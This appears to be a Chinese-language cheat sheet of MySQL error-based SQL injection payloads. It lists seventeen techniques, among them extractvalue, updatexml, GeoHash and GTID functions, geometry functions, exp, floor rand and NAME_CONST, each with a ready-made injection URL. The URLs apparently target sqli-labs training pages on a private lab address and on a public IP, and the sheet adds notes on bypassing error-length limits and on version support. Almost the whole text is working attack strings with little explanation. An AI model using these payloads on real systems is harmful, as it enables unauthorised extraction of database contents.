1.extractvalue报错注入

  1. http://192.168.64.135//sqlib/Less-1/index.php?id=1' and (extractvalue(1,concat(0x3a,version())),1)--+

image.png

  1. SELECT EXTRACTVALUE(0,CONCAT(hex(hex(version())),repeat(0,500),'.'));

image.png
报错长度绕过

  1. http://43.247.91.228:84/Less-1/?id=1' and EXTRACTVALUE(0,CONCAT(hex(hex(version())),repeat(0,500),'.'))--+

image.png
hex解码两次

2.updatexml报错注入

  1. http://192.168.64.135//sqlib/Less-1/index.php?id=1' and updatexml(1,concat(0x3a,version()),3)--+

sql语句

  1. SELECT * FROM users WHERE id='1' and updatexml(1,concat(0x3a,version()),3)-- ' LIMIT 0,1

image.png

3.ST_LatFromGeoHash()报错注入

MariaDB 5.5.65不支持此报错注入,MySQL5.0,5.1和5.5中都没有

  1. [root@localhost ~]# mysql --version
  2. mysql  Ver 15.1 Distrib 5.5.65-MariaDB, for Linux (x86_64) using readline 5.1

mysql 5.7支持报错注入,

  1. select ST_LatFromGeoHash(user());
  2. select ST_LatFromGeoHash(version());

image.png

4.ST_LongFromGeoHash()报错注入

mysql 5.7支持报错注入

  1. select ST_LongFromGeoHash(version());
  2. select ST_LongFromGeoHash(user());

image.png

5.GTID_SUBSET()报错注入

  1. select GTID_SUBSET(version(),1);
  2. select GTID_SUBSET(user(),1);

image.png

6.GTID_SUBTRACT()报错注入

  1. select GTID_SUBTRACT(version(),1);
  2. select GTID_SUBTRACT(user(),1);

image.png

7.ST_PointFromGeoHash()报错注入

  1. select ST_PointFromGeoHash(version(),1);
  2. select ST_PointFromGeoHash(user(),1);

image.png

8.polygon()报错注入

  1. http://43.247.91.228:84/Less-1/?id=1' and polygon((select * from(select * from(select user())a)b))--+

image.png

9.exp()报错注入

  1. http://43.247.91.228:84/Less-1/?id=1' and exp(~(select * from(select user())a))--+

image.png

10.multipoint()报错注入

  1. http://43.247.91.228:84/Less-1/?id=1' and multipoint((select * from(select * from(select version())a)b))--+

image.png

11.geometrycollection()报错注入

  1. http://43.247.91.228:84/Less-1/?id=1' and geometrycollection((select * from(select * from(select user())a)b))--+

image.png

12.multipolygon()报错注入

  1. http://43.247.91.228:84/Less-1/?id=1'  and multipolygon((select * from(select * from(select user())a)b))--+

image.png

13.linestring()报错注入

  1. http://43.247.91.228:84/Less-1/?id=1'  and linestring((select * from(select * from(select user())a)b))--+

image.png

14.multilinestring()报错注入

  1. http://43.247.91.228:84/Less-1/?id=1'  and multilinestring((select * from(select * from(select user())a)b))--+

image.png

15.floor()报错注入

  1. http://43.247.91.228:84/Less-1/?id=1'  and (select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

image.png

16.NAME_CONST()注入

  1. http://43.247.91.228:84/Less-1/?id=1'union select 1,2,3 from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x --+

image.png

17.利用!来溢出报错注入

  1. http://43.247.91.228:84/Less-5/?id=1%27%20union%20select%20(!(select%20*%20from%20(select%20user())x)%20-%20~0),2,3--+

image.png